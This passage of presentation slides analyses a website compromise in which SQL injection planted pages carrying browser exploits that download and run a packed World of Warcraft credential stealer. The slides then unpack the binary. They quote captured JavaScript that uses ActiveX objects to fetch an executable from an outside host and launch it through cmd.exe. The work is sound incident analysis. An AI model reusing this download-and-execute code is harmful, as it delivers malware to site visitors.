  • 25. Analyzing the injected HTML  Analyzing one exploit $ more Ms06-014.htm Svfox='http://mm.ll80.com/wow.exe'; qq853327659='C:MicroSoft.pif'; var Svfox_net=window["document"]["createElement"]("object"); Svfox_net["setAttribute"]("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); var Svfox2=Svfox_net["CreateObject"]("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P",""); var Svfox3=Svfox_net["CreateObject"]("Adodb.Stream",""); Svfox3["type"]=1; www_svfox_net=gn(10000); var hHf$R6=Svfox_net["CreateObject"]("Scripting.FileSystemObject",""); var VgDnZXHt7=hHf$R6["GetSpecialFolder"](0); www_svfox_net=hHf$R6["BuildPath"](VgDnZXHt7,www_svfox_net); var SmAcqIwGV8=Svfox_net["CreateObject"]("Shell.Application",""); exp1=hHf$R6["BuildPath"](VgDnZXHt7+'system32','cmd.exe'); SmAcqIwGV8["SHellExECuTe"](exp1,' /c echo C:MicroSoft.pif >C:MicroSoft.bat&echo del %0 >>C:MicroSoft.bat',"","open",0); @JirkaV
  • 26. Analyzing the injected HTML  Another exploit $ more pxhack.htm <a href="http://www.pxhac<script defer> var objFSO = new ActiveXObject('Scripting.FileSystemObject'); var objStream = objFSO.OpenTextFile(strFile,ForWriting,true,false); objStream.WriteLine('var objArgs = 'http://mm.ll80.com/wow.exe';'); objStream.WriteLine('var objargss ='c:gtest.exe';'); objStream.WriteLine('var sGet=new ActiveXObject('ADODB.Stream');'); objStream.WriteLine('try {'); objStream.WriteLine('xGet = new XMLHttpRequest();'); objStream.WriteLine('}'); objStream.WriteLine('catch (trymicrosoft) {'); objStream.WriteLine('try {'); objStream.WriteLine('xGet = new ActiveXObject('Msxml2.XMLHTTP');'); @JirkaV
  • 27. Analyzing the injected HTML  Exploits summary  All the HTML pages served only one purpose: To download wow.exe and execute it on victim’s computer  To achieve that, the attack tried to exploit multiple vulnerabilities in parallel to increase success probability.  The attack tried to exploit a web browser, flash, RealPlayer, ...  Why? Let’s see...  But first, another summary  @JirkaV
  • 28. Summary #2  The SQL injection tried to modify HTML pages in the database ... It is time to look at wow.exe  ... so anyone visiting this site would run JavaScript from another site...  ... that loaded several pages with various exploits ...  ... all trying to download and execute wow.exe on our visitor’s PC ... the name rings a bell, but let’s not jump into conclusions... @JirkaV
  • 29. Analyzing the binary  Checking wow.exe  Again, downloaded using wget $ xxd wow.exe | more 0000000: 4d5a 5000 0200 0000 0400 0f00 ffff 0000 MZP............. 0000010: b800 0000 0000 0000 4000 1a00 0000 0000 ........@....... 0000020: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000030: 0000 0000 0000 0000 0000 0000 0001 0000 ................ 0000040: ba10 000e 1fb4 09cd 21b8 014c cd21 9090 ........!..L.!.. 0000050: 5468 6973 2070 726f 6772 616d 206d 7573 This program mus 0000060: 7420 6265 2072 756e 2075 6e64 6572 2057 t be run under W 0000070: 696e 3332 0d0a 2437 0000 0000 0000 0000 in32..$7........ 00001f0: 0000 0000 0000 0000 5550 5830 0000 0000 ........UPX0.... 0000200: 00e0 0000 0010 0000 0000 0000 0004 0000 ................ 0000210: 0000 0000 0000 0000 0000 0000 8000 00e0 ................ 0000220: 5550 5831 0000 0000 0080 0000 00f0 0000 UPX1............ 0000230: 0076 0000 0004 0000 0000 0000 0000 0000 .v.............. 0000240: 0000 0000 4000 00e0 2e72 7372 6300 0000 ....@....rsrc... 0000250: 0010 0000 0070 0100 0002 0000 007a 0000 .....p.......z.. @JirkaV
  • 30. Analyzing the binary  Unpacking $ upx -d wow.exe Ultimate Packer for eXecutables Copyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006 UPX 2.02 Markus Oberhumer, Laszlo Molnar & John Reiser Aug 13th 2006 File size Ratio Format Name -------------------- ------ ----------- ----------- 43110 <- 33382 77.43% win32/pe wow.exe  But the unpacked file is still not very readable. What now?  Time for a long shot – what if it’s double-packed? $ xxd wow.exe | grep UPX 0005100: 0000 0000 0000 0000 5550 5830 0000 0000 ........UPX0.... 0005130: 5550 5831 0000 0000 0050 0000 0020 0100 UPX1.....P... .. 00052f0: 5550 5821 0d09 0209 fd3d 1daa 6ca2 d7ff UPX!.....=..l... @JirkaV
  • 31. Analyzing the binary  Unpacking wow.exe – the second time $ upx -d wow.exe Ultimate Packer for eXecutables Copyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006 UPX 2.02 Markus Oberhumer, Laszlo Molnar & John Reiser Aug 13th 2006 File size Ratio Format Name -------------------- ------ ----------- ----------- upx: wow.exe: NotPackedException: not packed by UPX  Obviously, there is a bit of magic going on  But we don’t really care – we know a secret  @JirkaV
  • 32. Analyzing the binary  Unpacking wow.exe – the second time (again) $ xxd wow.exe | grep MZ 0000000: 4d5a 5000 0200 0000 0400 0f00 ffff 0000 MZP............. 0004f10: 4d5a 5000 0200 0000 0400 0f00 ffff 0000 MZP............. 0006c30: 4402 c34d 5a89 50fc 1920 065b aef8 4ed7 D..MZ.P.. .[..N. Hmm, it seems that we have two headers there. Time to ask Python for help again... >>> data = open('wow.exe', 'rb').read() >>> data = data[0x4f10:] >>> open('wow_int.exe', 'wb').write(data) @JirkaV
  • 33. Analyzing the binary  Unpacking wow.exe – the second time (again) $ ls -lh wow* -rw-r--r-- 1 jirka users 43K 2008-07-23 07:29 wow.exe -rw-r--r-- 1 jirka users 23K 2008-08-02 01:02 wow_int.exe $ upx -d wow_int.exe Ultimate Packer for eXecutables Copyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006 UPX 2.02 Markus Oberhumer, Laszlo Molnar & John Reiser Aug 13th 2006 File size Ratio Format Name -------------------- ------ ----------- ----------- 44886 <- 22870 50.95% win32/pe wow_int.exe @JirkaV
  • 34. Analyzing the binary  Unpacking wow.exe – the second time (again) $ strings wow_int.exe | more TObject u:hD SVWUQ SOFTWAREBlizzard EntertainmentWorld of Warcraft cn4.grunt.wowchina.com cn6.grunt.wowchina.com kr.logon.worldofwarcraft.com eu.logon.worldofwarcraft.com tw.logon.worldofwarcraft.com /flash.asp QQQQQ3 ZYYd offline action= update @JirkaV
  • 35. Conclusion  What next?  The next step would be figuring out what exactly the code does with World of Warcraft... ...but games are not my cup of tea so I’ll stop here. @JirkaV
  • 36. Overall Summary  So, the attack was using vulnerable web server to attack its clients.  Each client would be attacked using range of exploits in order to download and execute double-packed file  This file would contact World of Warcraft servers @JirkaV